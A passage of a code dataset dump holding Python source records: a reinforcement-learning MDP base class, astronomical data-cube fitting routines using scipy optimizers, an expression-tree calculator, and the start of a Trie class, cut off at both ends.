context['textoMostrar'] = self.object.area\n context['list_url'] = reverse_lazy('project:form_readlist_area')\n return context","sub_path":"ServerDjango/apps/baliza/views/area/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395115989","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport copy\n\nfrom pyrlap.core.util import sample_prob_dict, SANSRTuple, SANSTuple\nfrom pyrlap.core.transition_function import TransitionFunction\n\nclass MDP(object):\n #=============================================#\n def get_init_state(self):\n raise NotImplementedError\n\n def get_init_state_dist(self):\n raise NotImplementedError\n\n def get_init_states(self):\n return []\n\n def is_terminal(self, s):\n raise NotImplementedError\n\n def is_absorbing(self, s):\n raise NotImplementedError\n\n def is_any_terminal(self, s):\n raise NotImplementedError\n\n def is_terminal_action(self, a):\n raise NotImplementedError\n\n def get_terminal_states(self):\n raise 
NotImplementedError\n\n def transition_reward_dist(self, s, a):\n raise NotImplementedError\n\n def transition_dist(self, s, a):\n trdist = self.transition_reward_dist(s, a)\n tdist = {}\n for (ns, r), p in trdist.items():\n tdist[ns] = tdist.get(ns, 0) + p\n return tdist\n\n def transition(self, s, a):\n return sample_prob_dict(self.transition_reward_dist(s, a))[0]\n\n def reward(self, s=None, a=None, ns=None):\n raise NotImplementedError\n\n def reward_dist(self, s=None, a=None, ns=None):\n raise NotImplementedError\n\n def available_actions(self, s=None):\n raise NotImplementedError\n\n # =============================================#\n \"\"\"\n There are multiple ways to represent the probability distribution\n P(ns, r | s, a). These are functions designed to let you define\n it in one way and then translate it into the other ways for use in\n different algorithms.\n \"\"\"\n\n def _cond_tfrf_to_joint(self, s=None, a=None):\n \"\"\"\n Requires that transition_dist(s, a) and reward_dist(s, a, ns)\n are defined.\n\n :param s:\n :param a:\n :return:\n \"\"\"\n tdist = self.transition_dist(s, a)\n trdist = {}\n for ns, tp in tdist.items():\n rdist = self.reward_dist(s, a, ns)\n for r, rp in rdist.items():\n trdist[(ns, r)] = tp * rp\n return trdist\n\n # ============================================= #\n\n def get_state_features(self, s):\n raise NotImplementedError\n\n def get_states(self):\n raise NotImplementedError\n\n def get_non_terminal_states(self):\n states = []\n for s in self.get_states():\n if not (\n self.is_absorbing(s) or\n self.is_terminal(s)\n ):\n states.append(s)\n return states\n\n def get_reachable_transition_reward_functions(self,\n max_states=np.inf,\n init_state=None,\n init_states=None):\n if init_states is None:\n init_states = []\n\n if init_state is None:\n init_state = self.get_init_state()\n\n init_states.append(init_state)\n frontier = set(init_states)\n visited = set([])\n tf = {}\n rf = {}\n while len(frontier) > 0 and len(tf) < max_states:\n s = frontier.pop()\n visited.add(s)\n tf[s] = tf.get(s, {})\n rf[s] = rf.get(s, {})\n for a in self.available_actions(s):\n tf[s][a] = tf[s].get(a, {})\n rf[s][a] = rf[s].get(a, {})\n tr_dist = self.transition_reward_dist(s, a)\n for (ns, r), p in tr_dist.items():\n tf[s][a][ns] = tf[s][a].get(ns, 0)\n tf[s][a][ns] += p\n\n rf[s][a][ns] = rf[s][a].get(ns, 0)\n rf[s][a][ns] += r*p\n if ns not in visited:\n frontier.add(ns)\n return (TransitionFunction(tf), rf)\n\n def get_reachable_states(self, max_states=np.inf,\n init_state=None, init_states=None):\n return self.get_reachable_transition_reward_functions(\n max_states, init_state, init_states\n )[0].keys()\n\n def get_state_actions(self):\n raise NotImplementedError\n\n def get_state_action_nextstates(self):\n raise NotImplementedError\n \n def iterate_sans_prob(self):\n for s in self.get_states():\n for a in self.available_actions(s):\n for ns, prob in self.transition_dist(s, a).items():\n yield (s, a, ns, prob)\n\n def get_reward_dict(self):\n raise NotImplementedError\n\n # =============================================#\n def get_optimal_policy(self):\n raise NotImplementedError\n\n def get_softmax_policy(self, temp):\n raise NotImplementedError\n\n # ============================================= #\n\n def plot(self):\n raise NotImplementedError\n\n # =============================================#\n\n def solve(self, discount_rate):\n raise NotImplementedError\n\n def calc_trajectory_return(self, traj, init_state=None, discount=1):\n value = 0\n\n if len(traj[0]) == 
1:\n ns = init_state\n \n for tup in traj:\n if len(tup) == 3:\n s, a, ns = tup\n elif len(tup) == 2:\n s, a = tup\n ns = self.transition(s, a)\n elif len(tup) == 1:\n a = tup\n s = ns\n ns = self.transition(s, a)\n value += self.reward(s=s, a=a, ns=ns)*discount\n return value\n\n def gen_transition_dict(self, start_state=None):\n tf, rf = self.get_reachable_transition_reward_functions(\n init_state=start_state\n )\n return tf\n\n def run_policy(self, policy, init_state=None):\n if init_state is None:\n init_state = self.get_init_state()\n traj = []\n s = init_state\n while not self.is_terminal(s):\n a = policy(s)\n ns = self.transition(s, a)\n r = self.reward(s, a, ns)\n traj.append(SANSRTuple(s, a, ns, r))\n s = ns\n return traj\n\n def enumerate_trajs(self, init_states=None, depth=4,\n no_deterministic_loops=True):\n if init_states is None:\n init_states = [self.get_init_state(), ]\n trajs = set([])\n frontier = \\\n set([tuple([SANSTuple(None, None, s),])for s in init_states])\n while len(frontier) > 0:\n pre_traj = list(frontier.pop())\n s = pre_traj[-1].ns\n if pre_traj[-1].s is None:\n pre_traj = []\n for a in self.available_actions(s):\n for ns, tp in self.transition_dist(s, a).items():\n if no_deterministic_loops and ns == s and tp == 1:\n continue\n new_pre_traj = copy.copy(pre_traj)\n new_pre_traj.append(SANSTuple(s, a, ns))\n if self.is_terminal(ns):\n trajs.add(tuple(new_pre_traj))\n elif len(new_pre_traj) == depth:\n trajs.add(tuple(new_pre_traj))\n else:\n frontier.add(tuple(new_pre_traj))\n return list(trajs)\n\n def as_matrices(self):\n aa = self.available_actions()\n aa_i = {a: i for i, a in enumerate(aa)}\n ss = self.get_states()\n ss_i = {s: i for i, s in enumerate(ss)}\n tf = np.zeros((len(ss), len(aa), len(ss)), dtype=np.float32)\n rf = np.zeros((len(ss), len(aa), len(ss)), dtype=np.float32)\n for s in ss:\n for a in aa:\n ns_dist = self.transition_dist(s, a)\n for ns, p in ns_dist.items():\n tf[ss_i[s], aa_i[a], ss_i[ns]] = p\n rf[ss_i[s], aa_i[a], ss_i[ns]] = self.reward(s, a, ns)\n s0 = self.get_init_state_dist()\n s0 = np.array([s0.get(s, 0) for s in ss], dtype=np.float32)\n non_term = set(self.get_non_terminal_states())\n nt_states = np.array([1 if s in non_term else 0 for s in ss])\n return {\n 'tf': tf, 'rf': rf, 's0': s0, 'ss': ss, 'aa': aa,\n 'nt_states': nt_states\n }\n\n def is_valid_transition(self, s, a, ns, *args, **kwargs):\n ns_dist = self.transition_dist(s, a)\n return ns in ns_dist\n\n def is_valid_trajectory(self, traj):\n for step in traj:\n if not self.is_valid_transition(*step):\n return False\n return True","sub_path":"lib/pyrlap/pyrlap/core/mdp/mdp.py","file_name":"mdp.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572687770","text":"from __future__ import print_function, division\n\nimport copy\nimport logging\n\nimport numpy as np\nfrom scipy.optimize import fmin_l_bfgs_b, fmin_bfgs, fmin\n\nfrom .utils import yxbounds\n\n__all__ = [\"guess_sky\", \"fit_galaxy_single\", \"fit_galaxy_sky_multi\",\n \"fit_position_sky\", \"fit_position_sky_sn_multi\"]\n\n\ndef _check_result(warnflag, msg):\n \"\"\"Check result of fmin_l_bfgs_b()\"\"\"\n if warnflag == 0:\n return\n if warnflag == 1:\n raise RuntimeError(\"too many function calls or iterations \"\n \"in fmin_l_bfgs_b()\")\n if warnflag == 2:\n raise RuntimeError(\"fmin_l_bfgs_b() exited with warnflag=2: %s\" % msg)\n raise RuntimeError(\"unknown warnflag: %s\" % warnflag)\n\n\ndef 
_check_result_fmin(warnflag):\n \"\"\"Check result of fmin()\"\"\"\n if warnflag == 0:\n return\n if warnflag == 1:\n raise RuntimeError(\"maximum number of function calls reached in fmin\")\n if warnflag == 2:\n raise RuntimeError(\"maximum number of iterations reached in fmin\")\n raise RuntimeError(\"unknown warnflag: %s\" % warnflag)\n\n\ndef _log_result(fn, fval, niter, ncall):\n \"\"\"Write the supplementary results from optimizer to the log\"\"\"\n logging.info(\" success: %3d iterations, %3d calls, val=%8.2f\",\n niter, ncall, fval)\n\n\ndef guess_sky_clipping(cube, clip, maxiter=10):\n \"\"\"Guess sky based on lower signal spaxels compatible with variance\n\n Parameters\n ----------\n cube : DataCube\n clip : float\n Number of standard deviations (not variances) to use as\n the clipping limit (on individual pixels).\n maxiter : int\n Maximum number of sigma-clipping interations. Default is 10.\n\n Returns\n -------\n sky : np.ndarray (1-d)\n Sky level for each wavelength.\n \"\"\"\n\n nspaxels = cube.ny * cube.nx\n\n weight = np.copy(cube.weight)\n var = 1.0 / weight\n\n # Loop until mask stops changing size or until a maximum\n # number of iterations.\n avg = None\n oldmask = None\n mask = None\n for j in range(maxiter):\n oldmask = mask\n\n # weighted average spectrum (masked array).\n # We use a masked array because some of the wavelengths\n # may have all-zero weights for every pixel.\n # The masked array gets propagated so that `mask` is a\n # masked array of booleans!\n avg = np.ma.average(cube.data, weights=weight, axis=(1, 2))\n deviation = cube.data - avg[:, None, None]\n mask = deviation**2 > clip**2 * var\n\n # Break if the mask didn't change.\n if (oldmask is not None and\n (mask.data == oldmask.data).all() and\n (mask.mask == oldmask.mask).all()):\n break\n\n # set weights of masked pixels to zero. masked elements\n # of the mask are *not* changed.\n weight[mask] = 0.0\n var[mask] = 0.0\n\n # convert to normal (non-masked) array. Masked wavelengths are\n # set to zero in this process.\n return np.asarray(avg)\n\n\ndef guess_sky(cube, npix=10):\n \"\"\"Guess sky based on lowest signal pixels.\n\n With the small field of fiew of an IFU, we have no guarantee of\n getting an accurate measurement of the real sky level; the galaxy\n might extend far past the edges of the IFU.\n\n Here we simply take a weighted average of the lowest `npix` pixels\n at each wavelength. 
This estimate will be higher than the real sky\n value (which would be lower than the lowest pixel value in the\n absence of noise), but its about the best we can do.\n\n Parameters\n ----------\n cube : DataCube\n npix : int\n\n Returns\n -------\n sky : np.ndarray (1-d)\n Sky level at each wavelength.\n \"\"\"\n\n # reshape data to (nw, nspaxels)\n flatshape = (cube.nw, cube.ny * cube.nx)\n flatdata = cube.data.reshape(flatshape)\n flatweight = cube.weight.reshape(flatshape)\n\n # get rid of spaxels that are *all* zero weight\n mask = ~np.all(flatweight == 0.0, axis=0)\n flatdata = flatdata[:, mask]\n flatweight = flatweight[:, mask]\n\n # average over wavelengths: 1-d array of (nspaxels,)\n avg = np.average(flatdata, weights=flatweight, axis=0)\n\n # get indicies of lowest `npix` spaxels in flattened data\n idx = np.argsort(avg)[0:npix]\n\n # get average spectrum of those spaxels\n sky = np.average(flatdata[:, idx], weights=flatweight[:, idx], axis=1)\n\n return sky\n\n\ndef determine_sky_and_sn(galmodel, snmodel, data, weight):\n \"\"\"Estimate the sky and SN level for a single epoch.\n\n Given a fixed galaxy and fixed SN PSF shape in the model, the\n (assumed spatially flat) sky background and SN flux are estimated.\n\n Parameters\n ----------\n galmodel : ndarray (3-d)\n The model, evaluated on the data grid.\n snmodel : ndarray (3-d)\n The PSF, evaluated on the data grid at the SN position.\n data : ndarray (3-d)\n weight : ndarray (3-d)\n\n Returns\n -------\n sky : ndarray\n 1-d sky spectrum for given epoch.\n sn : ndarray\n 1-d SN spectrum for given epoch.\n \"\"\"\n\n A11 = (weight * snmodel**2).sum(axis=(1, 2))\n A12 = (-weight * snmodel).sum(axis=(1, 2))\n A21 = A12\n A22 = weight.sum(axis=(1, 2))\n\n denom = A11*A22 - A12*A21\n\n # There are some cases where we have slices with only 0\n # values and weights. Since we don't mix wavelengths in\n # this calculation, we put a dummy value for denom and\n # then put the sky and sn values to 0 at the end.\n mask = denom == 0.0\n if not np.all(A22[mask] == 0.0):\n raise ValueError(\"found null denom for slices with non null \"\n \"weight\")\n denom[mask] = 1.0\n\n # w2d, w2dy w2dz are used to calculate the variance using\n # var(alpha x) = alpha^2 var(x)*/\n tmp = weight * data\n wd = tmp.sum(axis=(1, 2))\n wdsn = (tmp * snmodel).sum(axis=(1, 2))\n wdgal = (tmp * galmodel).sum(axis=(1, 2))\n\n tmp = weight * galmodel\n wgal = tmp.sum(axis=(1, 2))\n wgalsn = (tmp * snmodel).sum(axis=(1, 2))\n wgal2 = (tmp * galmodel).sum(axis=(1, 2))\n\n b_sky = (wd * A11 + wdsn * A12) / denom\n c_sky = (wgal * A11 + wgalsn * A12) / denom\n b_sn = (wd * A21 + wdsn * A22) / denom\n c_sn = (wgal * A21 + wgalsn * A22) / denom\n\n sky = b_sky - c_sky\n sn = b_sn - c_sn\n\n sky[mask] = 0.0\n sn[mask] = 0.0\n\n return sky, sn\n\n\ndef chisq_galaxy_single(galaxy, data, weight, ctr, atm):\n \"\"\"Chi^2 and gradient (not including regularization term) for a single\n epoch.\"\"\"\n\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n r = data - scene\n wr = weight * r\n val = np.sum(wr * r)\n grad = atm.gradient_helper(-2. 
* wr, data.shape[1:3], ctr)\n\n return val, grad\n\n\ndef chisq_galaxy_sky_single(galaxy, data, weight, ctr, atm):\n \"\"\"Chi^2 and gradient (not including regularization term) for \n single epoch, allowing sky to float.\"\"\"\n\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n r = data - scene\n\n # subtract off sky (weighted avg of residuals)\n sky = np.average(r, weights=weight, axis=(1, 2))\n r -= sky[:, None, None]\n\n wr = weight * r\n val = np.sum(wr * r)\n\n # See note in docs/gradient.tex for the (non-trivial) derivation\n # of this gradient!\n tmp = np.sum(wr, axis=(1, 2)) / np.sum(weight, axis=(1, 2))\n vtwr = weight * tmp[:, None, None]\n grad = atm.gradient_helper(-2. * (wr - vtwr), data.shape[1:3], ctr)\n\n return val, grad\n\n\ndef chisq_galaxy_sky_multi(galaxy, datas, weights, ctrs, atms):\n \"\"\"Chi^2 and gradient (not including regularization term) for \n multiple epochs, allowing sky to float.\"\"\"\n\n val = 0.0\n grad = np.zeros_like(galaxy)\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n epochval, epochgrad = chisq_galaxy_sky_single(galaxy, data, weight,\n ctr, atm)\n val += epochval\n grad += epochgrad\n\n return val, grad\n\n\ndef fit_galaxy_single(galaxy0, data, weight, ctr, atm, regpenalty, factor):\n \"\"\"Fit the galaxy model to a single epoch of data.\n\n Parameters\n ----------\n galaxy0 : ndarray (3-d)\n Initial galaxy model.\n data : ndarray (3-d)\n Sky-subtracted data.\n weight : ndarray (3-d)\n ctr : tuple\n Length 2 tuple giving y, x position of data in model coordinates.\n factor : float\n Factor used in fmin_l_bfgs_b to determine fit accuracy.\n \"\"\"\n\n # Define objective function to minimize.\n # Returns chi^2 (including regularization term) and its gradient.\n def objective(galparams):\n\n # galparams is 1-d (raveled version of galaxy); reshape to 3-d.\n galaxy = galparams.reshape(galaxy0.shape)\n cval, cgrad = chisq_galaxy_single(galaxy, data, weight, ctr, atm)\n rval, rgrad = regpenalty(galaxy)\n totval = cval + rval\n logging.debug(u'\\u03C7\\u00B2 = %8.2f (%8.2f + %8.2f)', totval, cval, rval)\n\n # ravel gradient to 1-d when returning.\n return totval, np.ravel(cgrad + rgrad)\n\n # run minimizer\n galparams0 = np.ravel(galaxy0) # fit parameters must be 1-d\n galparams, f, d = fmin_l_bfgs_b(objective, galparams0, factr=factor)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n return galparams.reshape(galaxy0.shape)\n\n\ndef fit_galaxy_sky_multi(galaxy0, datas, weights, ctrs, atms, regpenalty,\n factor):\n \"\"\"Fit the galaxy model to multiple data cubes.\n\n Parameters\n ----------\n galaxy0 : ndarray (3-d)\n Initial galaxy model.\n datas : list of ndarray\n Sky-subtracted data for each epoch to fit.\n \"\"\"\n\n nepochs = len(datas)\n\n # Get initial chisq values for info output.\n cvals_init = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n cval, _ = chisq_galaxy_single(galaxy0, data, weight, ctr, atm)\n cvals_init.append(cval)\n\n\n # Define objective function to minimize.\n # Returns chi^2 (including regularization term) and its gradient.\n def objective(galparams):\n\n # galparams is 1-d (raveled version of galaxy); reshape to 3-d.\n galaxy = galparams.reshape(galaxy0.shape)\n cval, cgrad = chisq_galaxy_sky_multi(galaxy, datas, weights,\n ctrs, atms)\n rval, rgrad = regpenalty(galaxy)\n rval *= nepochs\n rgrad *= nepochs\n\n totval = cval + rval\n logging.debug(u'\\u03C7\\u00B2 = %8.2f (%8.2f + %8.2f)', totval, cval, rval)\n\n # 
ravel gradient to 1-d when returning.\n return totval, np.ravel(cgrad + rgrad)\n\n # run minimizer\n galparams0 = np.ravel(galaxy0) # fit parameters must be 1-d\n galparams, f, d = fmin_l_bfgs_b(objective, galparams0, factr=factor)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n galaxy = galparams.reshape(galaxy0.shape)\n\n # Get final chisq values.\n cvals = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n cval, _ = chisq_galaxy_single(galaxy, data, weight, ctr, atm)\n cvals.append(cval)\n\n logging.info(u\" initial \\u03C7\\u00B2/epoch: [%s]\",\n \", \".join([\"%8.2f\" % v for v in cvals_init]))\n logging.info(u\" final \\u03C7\\u00B2/epoch: [%s]\",\n \", \".join([\"%8.2f\" % v for v in cvals]))\n\n # get last-calculated skys, given galaxy.\n skys = []\n for data, weight, ctr, atm in zip(datas, weights, ctrs, atms):\n scene = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n sky = np.average(data - scene, weights=weight, axis=(1, 2))\n skys.append(sky)\n\n return galaxy, skys\n\n\ndef fit_position_sky(galaxy, data, weight, ctr0, atm):\n \"\"\"Fit data position and sky for a single epoch (fixed galaxy model).\n\n Parameters\n ----------\n galaxy : ndarray (3-d)\n data : ndarray (3-d)\n weight : ndarray(3-d)\n ctr0 : (float, float)\n Initial center.\n\n Returns\n -------\n ctr : (float, float)\n (y, x) center position.\n sky : ndarray (1-d)\n Fitted sky.\n \"\"\"\n\n BOUND = 3. # +/- position bound in spaxels\n minbound = np.array(ctr0) - BOUND\n maxbound = np.array(ctr0) + BOUND\n\n gshape = galaxy.shape[1:3] # model shape\n dshape = data.shape[1:3]\n\n (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)\n minbound[0] = max(minbound[0], yminabs) # ymin\n maxbound[0] = min(maxbound[0], ymaxabs) # ymax\n minbound[1] = max(minbound[1], xminabs) # xmin\n maxbound[1] = min(maxbound[1], xmaxabs) # xmax\n\n def objective_func(ctr):\n if not (minbound[0] < ctr[0] < maxbound[0] and\n minbound[1] < ctr[1] < maxbound[1]):\n return np.inf\n gal = atm.evaluate_galaxy(galaxy, dshape, ctr)\n\n # determine sky (linear problem)\n resid = data - gal\n sky = np.average(resid, weights=weight, axis=(1, 2))\n\n out = np.sum(weight * (resid - sky[:, None, None])**2)\n\n logging.debug(\"(%f, %f) %f\", ctr[0], ctr[1], out)\n\n return out\n\n ctr, fval, niter, ncall, warnflag = fmin(objective_func, ctr0,\n full_output=1, disp=0)\n _check_result_fmin(warnflag)\n _log_result(\"fmin\", fval, niter, ncall)\n\n # get last-calculated sky.\n gal = atm.evaluate_galaxy(galaxy, dshape, ctr)\n sky = np.average(data - gal, weights=weight, axis=(1, 2))\n\n return tuple(ctr), sky\n\ndef chisq_position_sky_sn_multi(allctrs, galaxy, datas, weights, atms):\n \"\"\"Function to minimize. 
`allctrs` is a 1-d ndarray:\n\n [yctr[0], xctr[0], yctr[1], xctr[1], ..., snyctr, snxctr]\n\n where the indicies are\n \"\"\"\n EPS = 0.001 # size of change in spaxels for gradient calculation\n\n nepochs = len(datas)\n allctrs = allctrs.reshape((nepochs+1, 2))\n snctr = tuple(allctrs[nepochs, :])\n\n # initialize return values\n grad = np.zeros_like(allctrs)\n chisq = 0.\n\n for i in range(nepochs):\n data = datas[i]\n weight = weights[i]\n atm = atms[i]\n ctr = tuple(allctrs[i, :])\n\n # calculate chisq for this epoch; add to total.\n gal = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr)\n psf = atm.evaluate_point_source(snctr, data.shape[1:3], ctr)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n epoch_chisq = np.sum(weight * (data - scene)**2)\n chisq += epoch_chisq\n\n # calculate change in chisq from changing the sn position,\n # in this epoch.\n for j, snctr2 in ((0, (snctr[0]+EPS, snctr[1] )),\n (1, (snctr[0] , snctr[1]+EPS))):\n psf = atm.evaluate_point_source(snctr2, data.shape[1:3], ctr)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n new_epoch_chisq = np.sum(weight * (data - scene)**2)\n grad[nepochs, j] += (new_epoch_chisq - epoch_chisq) / EPS\n\n # calculate change in chisq from changing the data position for\n # this epoch.\n for j, ctr2 in ((0, (ctr[0]+EPS, ctr[1] )),\n (1, (ctr[0] , ctr[1]+EPS))):\n gal = atm.evaluate_galaxy(galaxy, data.shape[1:3], ctr2)\n psf = atm.evaluate_point_source(snctr, data.shape[1:3], ctr2)\n sky, sn = determine_sky_and_sn(gal, psf, data, weight)\n scene = sky[:, None, None] + gal + sn[:, None, None] * psf\n new_epoch_chisq = np.sum(weight * (data - scene)**2)\n grad[i, j] = (new_epoch_chisq - epoch_chisq) / EPS\n\n # reshape gradient to 1-d upon return.\n return chisq, np.ravel(grad)\n\ndef fit_position_sky_sn_multi(galaxy, datas, weights, ctrs0, snctr0, atms):\n \"\"\"Fit data pointing (nepochs), SN position (in model frame),\n SN amplitude (nepochs), and sky level (nepochs). This is meant to be\n used only on epochs with SN light.\n\n Parameters\n ----------\n galaxy : ndarray (3-d)\n datas : list of ndarray (3-d)\n weights : list of ndarray (3-d)\n ctrs0 : list of tuples\n Initial data positions (y, x)\n snctr0 : tuple\n Initial SN position.\n atms : list of AtmModels\n\n Returns\n -------\n fctrs : list of tuples\n Fitted data positions.\n fsnctr : tuple\n Fitted SN position.\n skys : list of ndarray (1-d)\n FItted sky spectra for each epoch.\n sne : list of ndarray (1-d)\n Fitted SN spectra for each epoch.\n\n Notes\n -----\n Given the data pointing and SN position, determining\n the sky level and SN amplitude is a linear problem. Therefore, we\n have only the data pointing and sn position as parameters in the\n (nonlinear) optimization and determine the sky and sn amplitude in\n each iteration.\n \"\"\"\n\n BOUND = 2. # +/- position bound in spaxels\n\n nepochs = len(datas)\n assert len(weights) == len(ctrs0) == len(atms) == nepochs\n\n # Initial parameter array. Has order [y0, x0, y1, x1, ... 
, ysn, xsn].\n allctrs0 = np.ravel(np.vstack((ctrs0, snctr0)))\n\n # Default parameter bounds for all parameters.\n minbound = allctrs0 - BOUND\n maxbound = allctrs0 + BOUND\n\n # For data position parameters, check that bounds do not extend\n # past the edge of the model and adjust the minbound and maxbound.\n # For SN position bounds, we don't do any checking like this.\n gshape = galaxy.shape[1:3] # model shape\n for i in range(nepochs):\n dshape = datas[i].shape[1:3]\n (yminabs, ymaxabs), (xminabs, xmaxabs) = yxbounds(gshape, dshape)\n minbound[2*i] = max(minbound[2*i], yminabs) # ymin\n maxbound[2*i] = min(maxbound[2*i], ymaxabs) # ymax\n minbound[2*i+1] = max(minbound[2*i+1], xminabs) # xmin\n maxbound[2*i+1] = min(maxbound[2*i+1], xmaxabs) # xmax\n\n # [(y0min, y0max), (x0min, x0max), ...]\n bounds = list(zip(minbound, maxbound))\n\n def callback(params):\n for i in range(len(params)//2-1):\n logging.debug('Epoch %s: %s, %s', i, params[2*i], params[2*i+1])\n logging.debug('SN position %s, %s', params[-2], params[-1])\n logging.debug('Bounds:')\n callback(bounds)\n logging.debug('')\n\n fallctrs, f, d = fmin_l_bfgs_b(chisq_position_sky_sn_multi, allctrs0,\n args=(galaxy, datas, weights, atms),\n iprint=0, callback=callback, bounds=bounds)\n _check_result(d['warnflag'], d['task'])\n _log_result(\"fmin_l_bfgs_b\", f, d['nit'], d['funcalls'])\n\n # pull out fitted positions\n fallctrs = fallctrs.reshape((nepochs+1, 2))\n fsnctr = tuple(fallctrs[nepochs, :])\n fctrs = [tuple(fallctrs[i, :]) for i in range(nepochs)]\n\n # evaluate final sky and sn in each epoch\n skys = []\n sne = []\n for i in range(nepochs):\n gal = atms[i].evaluate_galaxy(galaxy, datas[i].shape[1:3], fctrs[i])\n psf = atms[i].evaluate_point_source(fsnctr, datas[i].shape[1:3],\n fctrs[i])\n sky, sn = determine_sky_and_sn(gal, psf, datas[i], weights[i])\n skys.append(sky)\n sne.append(sn)\n\n return fctrs, fsnctr, skys, sne\n","sub_path":"cubefit/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":19257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"399730513","text":"class compile_TreeNode(object):\n def __init__(self, left=None, right=None, v_node=''):\n self.left = left\n self.right = right\n self.node_value = v_node\n self.priority = 0\n self.is_Leaf = False\n return\n\n def isLeaf(self):\n if self.left is None and self.right is None:\n self.is_Leaf = True\n else:\n self.is_Leaf = False\n\n\nclass compile_Tree(object):\n def __init__(self):\n # self.prior_lexPool = Calc_Object.lexBox.lexPool\n return\n\n @staticmethod\n def make_priority(Calc_Object, tb_id=0, end_id=0):\n calculator = Calc_Object\n lexCon = calculator.lexBox.lexPool\n for index in range(tb_id, end_id, 1):\n if lexCon[index]['e_Value'] is '(':\n b_index = calculator.lexBox.match_map[str(index+1)]\n b_id = calculator.lexBox.bracket_record[')'][b_index-1]\n for p_prior in range(index+1, b_id, 1):\n if lexCon[p_prior]['is_Calc']:\n if lexCon[p_prior]['e_Value'] is not '(':\n if lexCon[p_prior]['e_Value'] in ['*', '/']:\n lexCon[p_prior]['priority'] = lexCon[index]['priority'] + 1\n elif lexCon[p_prior]['e_Value'] in ['+', '-']:\n lexCon[p_prior]['priority'] = lexCon[index]['priority']\n else:\n bb_index = calculator.lexBox.match_map[str(p_prior+1)]\n bb_id = calculator.lexBox.bracket_record[')'][bb_index-1]\n lexCon[p_prior]['priority'] = lexCon[index]['priority'] + 2\n compile_Tree.make_priority(Calc_Object, tb_id=p_prior, end_id=bb_id)\n return\n\n def get_rValue(self):\n\n 
return\n\n @staticmethod\n def make_Tree(lex_Slice, lex_Object):\n min_priority = 1e5\n min_id_list = []\n _id = 1\n cnt = 0\n lexCon = lex_Slice\n temp_lex = []\n t_root = compile_TreeNode()\n # In a Block\n for item in lexCon:\n temp_lex.append(item)\n if item['is_Calc'] and item['e_Value'] in ['(', ')']:\n temp_lex.remove(item)\n assert len(temp_lex) > 0\n if len(temp_lex) == 1:\n t_root.node_value = temp_lex[_id-1]['e_Value']\n # t_root.priority = temp_lex[_id-1]['priority']\n else:\n for item in temp_lex:\n cnt += 1\n if item['is_Calc'] and item['e_Value'] not in ['(', ')']:\n if min_priority >= item['priority']:\n min_priority = item['priority']\n # min_id = item['lex_id']\n _id = cnt\n # Assert Index range\n # Left Tree Branch\n # _l_end = lexCon[_id-2]['lex_id']\n # _l_index = lex_Object.bracket_record[')'].index(_l_end)\n # _l = lex_Object.match_map[')-{0}'.format(_l_index+1)]\n t_root.node_value = temp_lex[_id-1]['e_Value']\n llex_Slice_son = temp_lex[0:_id-1]\n assert len(llex_Slice_son) > 0\n if len(llex_Slice_son) > 1:\n new_lnode = compile_Tree.make_Tree(llex_Slice_son, lex_Object)\n else:\n new_lnode = compile_TreeNode(v_node=llex_Slice_son[0]['e_Value'])\n new_lnode.isLeaf()\n t_root.left = new_lnode\n # Right Tree Branch\n # _r = lexCon[_id]['lex_id']\n # _r_index = lex_Object.match_map['{0}'.format(_r)]\n # _r_end = lex_Object.bracket_record['('][_r_index-1]\n rlex_Slice_son = temp_lex[_id:]\n assert len(rlex_Slice_son) > 0\n if len(rlex_Slice_son) > 1:\n new_rnode = compile_Tree.make_Tree(rlex_Slice_son, lex_Object)\n else:\n new_rnode = compile_TreeNode(v_node=rlex_Slice_son[0]['e_Value'])\n new_rnode.isLeaf()\n t_root.right = new_rnode\n # Check is Leaf or not\n t_root.isLeaf()\n return t_root\n\n @staticmethod\n def calc_result(Tree_node):\n # DFS for result\n t_value = 0\n l_value = 0\n r_value = 0\n if not Tree_node.is_Leaf:\n if Tree_node.left is not None:\n l_value = compile_Tree.calc_result(Tree_node.left)\n if Tree_node.right is not None:\n r_value = compile_Tree.calc_result(Tree_node.right)\n if Tree_node.node_value is '+':\n t_value = l_value + r_value\n if Tree_node.node_value is '-':\n t_value = l_value - r_value\n if Tree_node.node_value is '*':\n t_value = l_value * r_value\n if Tree_node.node_value is '/':\n t_value = l_value / r_value\n else:\n t_value = float(Tree_node.node_value)\n return t_value\n\n\n\n\n\n\n","sub_path":"num_calculator/Compile_Tree.py","file_name":"Compile_Tree.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"111722120","text":"import unittest\nfrom typing import List\n\nclass Trie:\n def __init__(self):\n self.children = {}\n self.index = None\n\n def insert(self, word, i):\n curr = self\n for c in word:\n if c not in curr.children:\n curr.children[c] = Trie()\n curr = curr.children[c]\n curr.index = i\n\n def search(self, prefix):\n curr = self\n indexes = []\n for c in prefix:\n if c not in curr.children:\n # unmatched part can still be pal, so don't return\n break\n if curr.index is not None:\n # unmatched part can still be pal, so count any met word\n indexes.append(curr.index)\n curr = curr.children[c]\n\n # find all words with matched prefix (part)\n def dfs(trie):\n if trie.index is not None:\n indexes.append(trie.index)\n for c in trie.children.values():\n 